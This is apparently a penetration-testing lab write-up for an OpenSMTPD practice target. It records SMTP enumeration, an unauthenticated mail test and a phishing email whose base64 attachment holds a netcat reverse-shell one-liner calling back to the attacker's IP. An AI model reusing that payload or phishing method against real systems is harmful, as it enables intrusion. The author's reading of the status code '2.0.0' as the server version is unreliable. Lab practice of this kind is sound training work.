InfoSec LAB

Bratarina_SMTP

Created: 3 min read

SMTP

Nmap discovered a SMTP server on the target port 25 The running service is OpenSMTPD

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/bratarina]
└─$ telnet $IP 25                                  
Trying 192.168.132.71...
Connected to 192.168.132.71.
Escape character is '^]'.
220 bratarina ESMTP OpenSMTPD
EHLO all
250-bratarina Hello all [192.168.45.192], pleased to meet you
250-8BITMIME
250-ENHANCEDSTATUSCODES
250-SIZE 36700160
250-DSN
250 HELP
HELP
214-2.0.0 This is OpenSMTPD
214-2.0.0 To report bugs in the implementation, please contact bugs@openbsd.org
214-2.0.0 with full details
214 2.0.0 End of HELP info

It would appear that the target OpenSMTPD instance is running the version 2.0.0

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/bratarina]
└─$ swaks --to root@localhost --server $IP      
=== Trying 192.168.132.71:25...
=== Connected to 192.168.132.71.
<-  220 bratarina ESMTP OpenSMTPD
 -> EHLO kali
<-  250-bratarina Hello kali [192.168.45.192], pleased to meet you
<-  250-8BITMIME
<-  250-ENHANCEDSTATUSCODES
<-  250-SIZE 36700160
<-  250-DSN
<-  250 HELP
 -> MAIL FROM:<kali@kali>
<-  250 2.0.0 Ok
 -> RCPT TO:<root@localhost>
<-  250 2.1.5 Destination address valid: Recipient ok
 -> DATA
<-  354 Enter mail, end with "." on a line by itself
 -> Date: Mon, 24 Mar 2025 11:58:18 +0100
 -> To: root@localhost
 -> From: kali@kali
 -> Subject: test Mon, 24 Mar 2025 11:58:18 +0100
 -> Message-Id: <20250324115818.012278@kali>
 -> X-Mailer: swaks v20240103.0 jetmore.org/john/code/swaks/
 -> 
 -> This is a test mailing
 -> 
 -> 
 -> .
<-  250 2.0.0 678f78c1 Message accepted for delivery
 -> QUIT
<-  221 2.0.0 Bye
=== Connection closed with remote host.

The target SMTP server allows sending mail without authentication

Phishing Attempt

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/bratarina]
└─$ swaks --to neil@localhost --header "subject: Check this out" --body "http://192.168.45.192" --attach @shell --server $IP     
=== Trying 192.168.132.71:25...
=== Connected to 192.168.132.71.
<-  220 bratarina ESMTP OpenSMTPD
 -> EHLO kali
<-  250-bratarina Hello kali [192.168.45.192], pleased to meet you
<-  250-8BITMIME
<-  250-ENHANCEDSTATUSCODES
<-  250-SIZE 36700160
<-  250-DSN
<-  250 HELP
 -> MAIL FROM:<kali@kali>
<-  250 2.0.0 Ok
 -> RCPT TO:<neil@localhost>
<-  250 2.1.5 Destination address valid: Recipient ok
 -> DATA
<-  354 Enter mail, end with "." on a line by itself
 -> Date: Mon, 24 Mar 2025 12:21:55 +0100
 -> To: neil@localhost
 -> From: kali@kali
 -> Subject: test Mon, 24 Mar 2025 12:21:55 +0100
 -> Message-Id: <20250324122155.026139@kali>
 -> X-Mailer: swaks v20240103.0 jetmore.org/john/code/swaks/
 -> MIME-Version: 1.0
 -> Content-Type: multipart/mixed; boundary="----=_MIME_BOUNDARY_000_26139"
 -> subject: Check this out
 -> 
 -> ------=_MIME_BOUNDARY_000_26139
 -> Content-Type: text/plain
 -> 
 -> http://192.168.45.192
 -> ------=_MIME_BOUNDARY_000_26139
 -> Content-Type: application/octet-stream; name="shell"
 -> Content-Description: shell
 -> Content-Disposition: attachment; filename="shell"
 -> Content-Transfer-Encoding: BASE64
 -> 
 -> bWtmaWZvIC90bXAvdHFoeTsgbmMgMTkyLjE2OC40NS4xOTIgNDQ1IDA8L3RtcC90cWh5IHwgL2Jp
 -> bi9zaCA+L3RtcC90cWh5IDI+JjE7IHJtIC90bXAvdHFoeQ==
 -> 
 -> ------=_MIME_BOUNDARY_000_26139--
 -> 
 -> 
 -> .
<-  250 2.0.0 570b54fe Message accepted for delivery
 -> QUIT
<-  221 2.0.0 Bye
=== Connection closed with remote host.

Phishing attempt failed to the neil user found in the passwd backup file

Vulnerabilities

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/bratarina]
└─$ searchsploit OpenSMTPD
----------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                               |  Path
----------------------------------------------------------------------------- ---------------------------------
OpenSMTPD - MAIL FROM Remote Code Execution (Metasploit)                     | linux/remote/48038.rb
OpenSMTPD - OOB Read Local Privilege Escalation (Metasploit)                 | linux/local/48185.rb
OpenSMTPD 6.4.0 < 6.6.1 - Local Privilege Escalation + Remote Code Execution | openbsd/remote/48051.pl
OpenSMTPD 6.6.1 - Remote Code Execution                                      | linux/remote/47984.py
OpenSMTPD 6.6.3 - Arbitrary File Read                                        | linux/remote/48139.c
OpenSMTPD < 6.6.3p1 - Local Privilege Escalation + Remote Code Execution     | openbsd/remote/48140.c
----------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results

Looking OpenSMTPD up for vulnerabilities reveals many exploits. Given the instance is running the version 2.0.0, it’s vulnerable to all of those, including CVE-2020-7247

Interactive Graph View

Backlinks